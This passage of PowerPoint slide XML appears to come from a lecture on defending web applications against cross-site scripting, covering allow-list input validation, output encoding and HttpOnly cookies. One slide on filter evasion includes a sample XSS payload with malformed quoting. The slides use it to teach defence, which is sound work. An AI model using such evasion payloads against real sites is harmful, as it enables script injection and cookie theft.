          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="304800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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38936" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="4006850"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>How to Protect Yourself (OWASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The best way to protect against XSS attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Ensure that your app validates all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what should be allowed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types of active content and too many ways of encoding it to get around filters for such content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>We strongly recommend a ‘positive’ security policy that specifies what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete. </a:t>
            </a:r>
          </a:p>
          <a:p>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Input data validation and filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Never trust client-side data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Best: allow only what you expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Remove/encode special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Many encodings, special chars!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>E.g., long (non-standard) UTF-8 encodings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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smtClean="0"/>
              <a:t>Output filtering / encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Remove / encode (X)HTML special chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &lt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &gt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> for “ …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Allow only safe commands (e.g., no &lt;script&gt;…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: `filter evasion` tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>See XSS Cheat Sheet for filter evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>E.g., if filter allows quoting (of &lt;script&gt; etc.), use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    malformed quoting: &lt;IMG “””&gt;&lt;SCRIPT&gt;alert(“XSS”)…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Or: (long) UTF-8 encode, or…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: Scripts not only in &lt;script&gt;!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Examples in a few slides</a:t>
            </a:r>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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="152400"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HttpOnly Cookies    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> IE6 SP1,   FF2.0.0.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1692275"/>
            <a:ext cx="1128713" cy="8382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2" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288"/>
            <a:ext cx="914400" cy="6096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0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 166667"/>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4" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2759075"/>
            <a:ext cx="1143000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345545" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345546" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2073275"/>
            <a:ext cx="3581400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345548" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1600200"/>
            <a:ext cx="1203325" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2301875"/>
            <a:ext cx="3581400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362200"/>
            <a:ext cx="4800600" cy="1138238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>HTTP Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Set-cookie:	NAME=VALUE ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3810000"/>
            <a:ext cx="8056563" cy="2741613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  Cookie sent over HTTP(s),  but not accessible to scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> Also blocks access from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> …  but does not stop most other risks of XSS bugs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57358" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7443788" y="914400"/>
            <a:ext cx="1593850" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(not Safari?)</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55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mtClean="0"/>
              <a:t>Points to remember</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Key concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Whitelisting vs. blacklisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Output encoding vs. input sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
